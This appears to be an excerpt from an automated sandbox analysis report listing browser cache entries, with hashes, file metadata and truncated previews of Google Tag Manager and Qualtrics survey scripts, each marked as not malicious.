                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"602",. . "macros":[{"function":"__v","vtp_name":"gtm.element","vtp_dataLayerVersion":1},{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"userId"},{"function":"__jsm","vtp_javascript":["template","(function(){if(0!==",["escape",["macro",2],8,16],")return ",["escape",["macro",2],8,16],"})();"]},{"function":"__d","vtp_elementId":"gtm-page-title","vtp_selectorType":"ID"},{"function":"__u","vtp_component":"QUERY","vtp_queryKey":"utm_campaign","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__remm","vtp_setDefaultValue":true,"vtp_input":["macro",5],"vtp_fullMatch":true,"vtp_replaceAfterMatch":true,"vtp_ignoreCase":true,"vtp_defaultValue":"0","vtp_map":["list",["map","key","^[0-9][0-9][0-9]*$"

                                                                                                                                                                                                                        Chrome Cache Entry: 95

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (28874)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):29728
                                                                                                                                                                                                                        Entropy (8bit):5.207704866341386
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:3B30454A1210F870F9CCD8FA13CE90E3
                                                                                                                                                                                                                        SHA1:35279080A8AE2F9FA0ED97710E60D2D70ACAFF80
                                                                                                                                                                                                                        SHA-256:B7F96797CF0DC8F26BF80BEF507D5C378A6409433346538A488C5BCF468597A0
                                                                                                                                                                                                                        SHA-512:D9ADE6EDF23661F6E2C5878E39F9AE60527757671835B7A69B29F3FF531960BE327A4164FD3A75630C46EAD6A775BB5944474A741C8965C7A8E01A200EB79356
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://siteintercept.qualtrics.com/dxjsmodule/1.63482081f3bf73c57075.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking
                                                                                                                                                                                                                        Preview:./*@preserve.***Version 2.27.0***.*/../*@license. * Copyright 2002 - 2018 Qualtrics, LLC.. * All rights reserved.. *. * Notice: All code, text, concepts, and other information herein (collectively, the. * "Materials") are the sole property of Qualtrics, LLC, except to the extent. * otherwise indicated. The Materials are proprietary to Qualtrics and are protected. * under all applicable laws, including copyright, patent (as applicable), trade. * secret, and contract law. Disclosure or reproduction of any Materials is strictly. * prohibited without the express prior written consent of an authorized signatory. * of Qualtrics. For disclosure requests, please contact notice@qualtrics.com.. */..try {. (window["WAFQualtricsWebpackJsonP-cloud-2.27.0"]=window["WAFQualtricsWebpackJsonP-cloud-2.27.0"]||[]).push([[1],{30:function(e,t,i){"use strict";i.d(t,"a",(function(){return o}));var n=function(e,t,i,n){return new(i||(i=Promise))((function(r

                                                                                                                                                                                                                        Chrome Cache Entry: 96

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2047)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):2901
                                                                                                                                                                                                                        Entropy (8bit):5.242251867822457
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:4B0A0CC77E429CC06DEFF2E7D65AB5EF
                                                                                                                                                                                                                        SHA1:87908D4FBBBED59447FE9F748AA23481D4D95ABB
                                                                                                                                                                                                                        SHA-256:91E73EE015BDC4C4B91119C0CE96F364FB826026CA45CA49BAB326C59497FFF6
                                                                                                                                                                                                                        SHA-512:47801F1DC93087FE1E0786BDBE4753C913DDDBF4E5A84D5417F873C28FD8A3EC7D3D172E8B8DB1F5DCDA6F13E2033DD245EA13F28479DE464D4AE485B7F6C4A8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://siteintercept.qualtrics.com/dxjsmodule/5.76657644fe1b73dc4306.chunk.js?Q_CLIENTVERSION=2.27.0&Q_CLIENTTYPE=web&Q_BRANDID=partnersatbooking
                                                                                                                                                                                                                        Preview:./*@preserve.***Version 2.27.0***.*/../*@license. * Copyright 2002 - 2018 Qualtrics, LLC.. * All rights reserved.. *. * Notice: All code, text, concepts, and other information herein (collectively, the. * "Materials") are the sole property of Qualtrics, LLC, except to the extent. * otherwise indicated. The Materials are proprietary to Qualtrics and are protected. * under all applicable laws, including copyright, patent (as applicable), trade. * secret, and contract law. Disclosure or reproduction of any Materials is strictly. * prohibited without the express prior written consent of an authorized signatory. * of Qualtrics. For disclosure requests, please contact notice@qualtrics.com.. */..try {. (window["WAFQualtricsWebpackJsonP-cloud-2.27.0"]=window["WAFQualtricsWebpackJsonP-cloud-2.27.0"]||[]).push([[5],{42:function(e,n,t){"use strict";t.r(n);var d=function(e,n){this.payload=n,this.type=e};t.d(n,"addPopunderEmbeddedDataHandler",(f

                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                        No static file info